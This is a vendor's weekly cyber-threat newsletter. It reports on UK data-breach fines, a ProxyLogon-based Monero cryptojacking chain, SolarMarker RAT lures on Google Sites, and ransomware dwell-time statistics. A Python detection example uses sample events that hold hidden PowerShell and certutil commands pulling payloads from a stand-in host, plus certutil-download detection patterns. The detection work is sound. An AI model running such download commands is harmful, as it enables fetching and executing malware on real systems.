Welcome to the latest edition of Neu Cyber Threats, a weekly series in which we at Neuways bring attention to the latest cybersecurity threats so that you stay safe online.

Here are the most prominent threats which you should be aware of:


Neu Cyber Threats

£42m in Data Breach Fines Issued to Businesses in 2020

The Information Commissioner’s Office (ICO) hit UK businesses with £42m in data breach fines last year. Fines were given out as a result of breaches of the Privacy and Electronic Communications Regulations (PECR) and the Data Protection Act (DPA).

The largest fine was handed to British Airways, which paid just over half of the £42.41m total, following a 2018 cyber attack in which the details of over half a million of its customers were stolen by cyber criminals.

The news highlights the need for businesses to improve their data management policies and to secure the data they hold correctly. During the COVID-19 pandemic, many companies may have prioritised other areas of their business and neglected improvements to their cyber security measures. Read more on the story and what to be aware of here.

Attackers Target ProxyLogon Exploit to Install Cryptojacker

Microsoft Exchange servers have again been targeted, this time by cyber criminals hosting a malicious Monero cryptominer in an “unusual attack”. This latest hit to Exchange servers follows the recent, infamous ProxyLogon exploit.

It was discovered that the threat actors compromised the Exchange servers using the same exploit that advanced persistent threat (APT) groups had already used to infect systems with everything from ransomware to web shells, and in this case used it to host Monero cryptomining malware.

The attack began with a PowerShell command to retrieve a file named win_r.zip from the Outlook Web Access logon path of another compromised server. On closer inspection, the .zip file was not a compressed archive at all but a batch script, which then invoked certutil.exe, a program built into Windows, to download two additional files, win_s.zip and win_d.zip, which were also not compressed archives.

A script then runs the executable, which extracts the miner and its configuration from the QuickCPU.dat file, injects the miner into a system process, and deletes the evidence that it was ever there. The executable appears to contain a modified version of a publicly available tool called PEx64-Injector, described as being able to migrate files without requiring any administrator privileges. Once the file runs on an infected system, it temporarily extracts the contents of QuickCPU.dat, which include an installer for the cryptominer and its configuration, to the file system. It configures the miner, injects it into a running process, then exits, leaving the miner running on the system with the damage done.

Researchers observed the cryptominer receiving funds on 9th March 2021, which incidentally is also when Microsoft released updates to Exchange to patch the flaws. Although the attacker lost several servers after this date and overall activity from the miner decreased, other servers gained afterwards more than made up for the early losses. The ProxyLogon problem began for Microsoft in early March, when the company said it had spotted multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. The four flaws chained together into a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials, giving them access to email communications and the ability to install a web shell for further exploitation within the environment.

Microsoft has already released an out-of-band update, and the company has confirmed that 92% of affected machines have been patched. However, much damage has already been done to businesses whose Exchange servers were affected by the issue, and unpatched, still-vulnerable systems remain out there.
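The chain described above leaves two traces a defender can look for: a built-in Windows program (certutil.exe) being used as a downloader, and files that carry a .zip name but are not archives. The following is an added example, not code from the newsletter or from any vendor: it runs two process-event rules and one file-content check over constructed sample data. The JSON field names (ts, host, parent, image, cmdline) imitate a Sysmon process-creation export but are an assumption, as is the rule that treats the IIS worker process w3wp.exe (which hosts Outlook Web Access) as a suspicious parent for PowerShell or certutil.

```python
"""Added example for the Exchange cryptominer story above (not the newsletter's
or any vendor's code). Detections, all run offline on constructed data:

  1. iis_worker_spawned_shell: w3wp.exe (assumed parent when a web shell runs
     commands on Exchange) launching PowerShell, cmd or certutil.
  2. certutil_download: certutil.exe called with its download switches and a URL,
     matching the win_s.zip / win_d.zip retrieval described in the story.
  3. zip_name_mismatch: a ".zip" file whose bytes lack the ZIP signature,
     matching the win_r.zip batch script described in the story.
"""
import json
import re
from typing import Dict, List

# Real certutil switches; using them as a download indicator is a common
# detection heuristic, not something stated in the newsletter.
CERTUTIL_DOWNLOAD_FLAGS = re.compile(r"(?i)(?:^|\s)-(?:urlcache|split|verifyctl)\b")
URL_IN_CMDLINE = re.compile(r"(?i)https?://")
SHELLS = ("powershell.exe", "cmd.exe", "certutil.exe")

# Constructed sample events, one JSON object per line (raw string, so the
# doubled backslashes reach the JSON parser as-is). Hostnames, paths and the
# example.invalid URL are made up for this demonstration.
SAMPLE_EVENTS = r"""
{"ts":"2021-03-09T10:14:02Z","host":"exch01","parent":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -c Invoke-WebRequest http://example.invalid/owa/auth/win_r.zip -OutFile C:\\Temp\\win_r.zip"}
{"ts":"2021-03-09T10:14:05Z","host":"exch01","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -urlcache -split -f http://example.invalid/owa/auth/win_s.zip C:\\Temp\\win_s.zip"}
{"ts":"2021-03-09T10:20:00Z","host":"ws07","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -verify C:\\certs\\server.cer"}
{"ts":"2021-03-09T10:21:00Z","host":"ws07","parent":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\7-Zip\\7z.exe","cmdline":"7z.exe x archive.zip"}
"""


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the detections that fire for one process event."""
    hits: List[str] = []
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent", ""))
    cmd = ev.get("cmdline", "")
    # Rule 1: the IIS worker process should not be launching shells or LOLBins.
    if parent == "w3wp.exe" and image in SHELLS:
        hits.append("iis_worker_spawned_shell")
    # Rule 2: certutil acting as a downloader (download switch plus a URL).
    if image == "certutil.exe" and CERTUTIL_DOWNLOAD_FLAGS.search(cmd) and URL_IN_CMDLINE.search(cmd):
        hits.append("certutil_download")
    return hits


def scan_events(raw_lines: str) -> Dict[str, List[str]]:
    """Map each event's timestamp to its detections; events with no hit are omitted."""
    results: Dict[str, List[str]] = {}
    for line in raw_lines.strip().splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        hits = classify_event(ev)
        if hits:
            results[ev["ts"]] = hits
    return results


# ZIP local-file, end-of-central-directory and spanned-archive signatures.
ZIP_MAGIC = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")


def zip_name_mismatch(filename: str, data: bytes) -> bool:
    """True when the name ends in .zip but the content is not a ZIP archive."""
    return filename.lower().endswith(".zip") and not data.startswith(ZIP_MAGIC)


# Constructed file contents: a batch script wearing a .zip name (as in the
# story) beside a genuine, if truncated, ZIP header.
SAMPLE_FILES = {
    "win_r.zip": b"@echo off\r\nrem constructed stand-in for the batch script\r\n",
    "archive.zip": b"PK\x03\x04\x14\x00\x00\x00\x08\x00" + b"\x00" * 20,
}


def find_masquerading_zips(files: Dict[str, bytes]) -> List[str]:
    """Names of files that claim to be ZIPs but are not, sorted for stable output."""
    return sorted(name for name, data in files.items() if zip_name_mismatch(name, data))


if __name__ == "__main__":
    for ts, hits in scan_events(SAMPLE_EVENTS).items():
        print(ts, ", ".join(hits))
    print("masquerading zips:", find_masquerading_zips(SAMPLE_FILES))
```

On the sample data the first two events fire (one per rule) while the legitimate certutil certificate check and the 7-Zip launch stay quiet, and only win_r.zip is reported as a masquerading archive. Rule 1 is the broadest of the three and is the one to tune per environment; the other two are specific enough to alert on directly.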

100,000 Google Sites Used to Install SolarMarker RAT

Cyber criminals are using search-engine optimisation (SEO) tactics to direct users searching for common business forms such as invoices, receipts or other templates to hacker-controlled Google-hosted domains.

Business users are being lured to over 100,000 malicious Google sites that appear legitimate, but instead install a remote access trojan (RAT), used to gain a foothold on a network and later infect systems with ransomware, credential-stealers, banking trojans and other malware.

Hundreds of thousands of unique, malicious web pages that contain popular business terms and keywords, including business-form related keywords like template, invoice, receipt, questionnaire and resume, were found over the last week.

Cyber criminals use Google search redirection and drive-by-download tactics to lead unsuspecting victims to the RAT: typically, a person who visits the infected site executes a binary disguised as a PDF by clicking on a purported “form”, thus infecting his or her machine. This is an increasingly common trend in malware delivery, and it speaks to the improved security of applications such as browsers that once handled vulnerable code. Unfortunately, it also reveals a glaring blind spot in controls, which allow users to execute untrusted binaries or script files at will.

The campaign is not only huge and far-reaching but sophisticated too. The common business terms serving as keywords for the threat actors’ search-optimisation strategy are convincing Google’s web crawler that the intended content meets conditions for a high page-rank score, which means the malicious sites will appear at the top of user searches, increasing the likelihood that victims will be lured to infected sites. Security heads and managers need to know that the threat group has gone to a lot of effort to compromise business professionals, spreading a wide net and using many tactics to successfully disguise their traps.

One recent incident observed by researchers involved a victim working in the financial industry who was searching for a free version of a document online and was redirected via Google Search to a Google Sites page under the control of the threat actors, which included an embedded download button. It is clear that the cyber criminals are targeting the right people, as someone working in the financial industry would be a “high-value target” of the campaign.

Once a RAT has been successfully installed on a victim’s computer, the hackers can upload additional malware to the device, such as a banking trojan, which could be used to hijack the online banking credentials of the business. Threat actors could also install a credential-stealer to harvest the employee’s email credentials and launch a business email compromise (BEC) scheme.

Neuways advises employees to consider what types of business forms, invoices, receipts and so on they usually search for online. By sharing this type of form on a centralised system such as Microsoft SharePoint, colleagues can exchange such documents without falling into the sophisticated traps laid by cyber criminals. Our Phishing Awareness Training is top-of-the-class and makes businesses safer through the education of their employees. Contact us on 01283 753333 or hello@neuways.com to discuss your options with us.

Breaches Detected Faster, But Ransomware Surge a Major Factor: FireEye

Recent data has shown that the time it takes businesses to detect a malicious attack continues to drop and it’s mostly due to companies becoming better at detecting cyber attacks.

The data show that organisations are getting better at detecting intrusions on their own, but also that the massive increase in ransomware attacks was another factor. Ransomware attacks are typically detected quickly, since the attackers make their presence known when they demand a ransom, after they have encrypted the victim’s files and/or stolen the victim’s data.

The number of days an attacker is present in a target’s environment before being discovered, the ‘dwell time’, decreased significantly in 2020 compared with the previous year, from 56 days to 24 days. Where a breach was reported by an external party, the median dwell time in 2020 was 73 days; where it was detected internally, it was only 12 days. 59% of the breaches investigated globally during this period were detected internally, compared with 47% in 2019. In the ransomware attacks investigated by researchers, 78% had a dwell time of 30 days or less, and only 1% had a dwell time of 700 days or more. As noted above, this is likely due to how easily ransomware attacks can be operated: rather than putting all of their eggs in one basket (a single targeted attack), cyber criminals can attack thousands of businesses at once.

Interestingly, the median global dwell time was just 5 days for ransomware investigations and 45 days for non-ransomware investigations. Overall, the global median dwell time has fallen steadily over the past decade, from 416 days in 2011 to 24 days in 2020. The data also note new extortion techniques used by ransomware gangs, the phishing and extortion campaigns of a cybercrime group named FIN11, the activity of the threat group behind the SolarWinds supply chain attack, and malicious actors shifting their focus to the systems that support remote work. In terms of attack tactics, attackers were found to have used 63% of MITRE ATT&CK techniques and 24% of sub-techniques over the analysed time frame. However, the company said, just 37% of the techniques observed (23% of all techniques) were seen in more than 5% of the intrusions it investigated.

Neuways advises businesses to remain constantly aware of the threat from phishing campaigns, ransomware and cyber criminals. The rise of ransomware is often attributed to the chaos and disruption businesses have gone through over the last 12 months, between the increase in remote working and national lockdowns. As the UK emerges from lockdown, businesses must prepare for continued ransomware-laden phishing campaigns: employees should remain vigilant when answering emails or phone calls, so that they do not fall victim to cyber criminals aiming to extort money from their company.

If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.